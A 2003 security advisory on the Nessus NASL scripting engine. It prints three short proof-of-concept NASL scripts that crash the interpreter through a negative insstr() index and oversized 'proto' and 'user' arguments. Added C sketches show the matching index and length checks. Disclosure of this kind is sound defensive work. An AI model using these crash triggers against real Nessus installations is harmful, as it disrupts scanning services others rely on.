Nessus NASL scripting engine security issues
  Author: Ravish Ahuja
Added: 05/24/2003
Type: Advisory
Details

There exist several vulnerabilities in the NASL scripting engine.
To exploit these flaws, an attacker would need a valid Nessus account
together with the ability to upload arbitrary Nessus plugins to the
Nessus server (this option is disabled by default), or would need to
trick a user into running a specially crafted NASL script.

Note that these issues can NOT be exploited by a tested host to crash
nessusd remotely.

* ISSUE 1 - Integer handling vulnerability in insstr() function

The vulnerability is triggered by a negative fourth argument:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl)  insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)
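The nasl output above shows the interpreter noticing that the second index (-3) is smaller than the first (3), printing a warning, and then carrying on until it crashes. The defensive point is that a negative or inverted index must be rejected before it is used in any length arithmetic, because once a negative value is converted to an unsigned size it becomes a huge count. The following C sketch is an added illustration of that check; it is not taken from the Nessus or NASL sources, and the semantics of the hypothetical safe_insstr() helper (replace characters i1..i2 of the first string with the second) are assumed for the purpose of the example.

```c
/* Added illustration, not from the Nessus/NASL sources: index validation for
 * an insstr-style helper. Assumed semantics of the hypothetical safe_insstr():
 * characters s[i1..i2] (inclusive) are replaced by the whole of ins and the
 * result is written to out. Indices are taken as long so that the value
 * 0xfffffffd from the advisory's t1.nasl arrives as -3, exactly as the nasl
 * warning prints it. */
#include <stdio.h>
#include <string.h>

/* Returns 0 on success and -1 on any invalid index or if out is too small.
 * out is left untouched on failure. */
int safe_insstr(const char *s, const char *ins, long i1, long i2,
                char *out, size_t outsz)
{
    size_t slen = strlen(s);
    size_t inslen = strlen(ins);

    /* Validate while the values are still signed: casting a negative i2 to
     * size_t would turn it into a huge offset and wrap the arithmetic below. */
    if (i1 < 0 || i2 < 0 || i1 > i2)
        return -1;
    if ((size_t)i2 >= slen)
        return -1;

    size_t head = (size_t)i1;               /* bytes kept before i1 */
    size_t tail = slen - (size_t)i2 - 1;    /* bytes kept after i2  */
    size_t need = head + inslen + tail + 1; /* plus the terminator  */
    if (need > outsz)
        return -1;

    memcpy(out, s, head);
    memcpy(out + head, ins, inslen);
    memcpy(out + head + inslen, s + (size_t)i2 + 1, tail);
    out[need - 1] = '\0';
    return 0;
}

/* Mirrors the advisory's t1.nasl call: insstr("aaaaaaaaaaa", "bb", 3, -3).
 * Returns 1 if the call is refused (the desired outcome), 0 otherwise. */
int insstr_t1_rejected(void)
{
    char out[64];
    /* -3 is 0xfffffffd interpreted as a signed 32-bit integer */
    return safe_insstr("aaaaaaaaaaa", "bb", 3, -3, out, sizeof out) == -1;
}
```

The order of the checks matters: the sign tests run first, and only then is i2 compared against the string length as an unsigned quantity. A warning that does not also abort the call, as in the output above, gives no protection at all.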

* ISSUE 2 - Buffer overflow in scanner_add_port() function

The overflow is triggered by a very long 'proto' argument:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

* ISSUE 3 - Buffer overflow in ftp_log_in() function

The overflow is triggered by very long 'user'/'pass' arguments:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
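Issues 2 and 3 share one root cause: a string whose length the script controls (300 bytes of 'A' for 'proto', 8192 bytes for 'user') is copied into storage of a fixed size. The C sketch below is an added illustration of how an interpreter built-in should treat such arguments; it is not taken from the Nessus or NASL sources, and the buffer sizes PROTO_MAX and FTP_LINE_MAX, the struct port_entry layout and the helper names checked_add_port() and build_ftp_user_line() are all assumptions made for the example. The long inputs are constructed inline to mirror the advisory's crap(data:'A', length:N) calls.

```c
/* Added illustration, not from the Nessus/NASL sources: length-checked
 * handling of script-supplied string arguments. The storage sizes and
 * helper names below are assumptions made for this example. */
#include <stdio.h>
#include <string.h>

#define PROTO_MAX 16       /* assumed limit for a protocol name          */
#define FTP_LINE_MAX 512   /* assumed limit for one FTP command line     */

struct port_entry {
    int  port;
    char proto[PROTO_MAX];
};

/* Returns 0 on success, -1 if proto would not fit including its NUL.
 * The entry is rejected rather than silently truncated. */
int checked_add_port(struct port_entry *e, int port, const char *proto)
{
    size_t n = strlen(proto);
    if (port < 0 || port > 65535 || n == 0 || n >= sizeof e->proto)
        return -1;
    e->port = port;
    memcpy(e->proto, proto, n + 1);
    return 0;
}

/* Builds "USER <name>\r\n" into line. Returns the number of bytes written,
 * or -1 if the argument would not fit: snprintf returns the length the
 * full string would have had, so a value >= linesz means truncation. */
int build_ftp_user_line(char *line, size_t linesz, const char *user)
{
    int n = snprintf(line, linesz, "USER %s\r\n", user);
    if (n < 0 || (size_t)n >= linesz)
        return -1;
    return n;
}

/* Constructed inputs mirroring the advisory's t2.nasl and t3.nasl arguments.
 * Returns the number of oversized arguments that were refused (expected 2). */
int demo_long_arguments(void)
{
    static char proto300[301];
    static char user8192[8193];
    memset(proto300, 'A', 300);
    proto300[300] = '\0';
    memset(user8192, 'A', 8192);
    user8192[8192] = '\0';

    struct port_entry e;
    char line[FTP_LINE_MAX];
    int rejected = 0;
    if (checked_add_port(&e, 80, proto300) == -1)
        rejected++;
    if (build_ftp_user_line(line, sizeof line, user8192) == -1)
        rejected++;
    return rejected;
}
```

Both helpers return an error to the caller instead of writing past the buffer, so the interpreter can report a script error rather than crash; the same length check belongs wherever 'pass' is copied, since the advisory lists it alongside 'user'.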

Copyright Linux Advisory 2003. All rights reserved.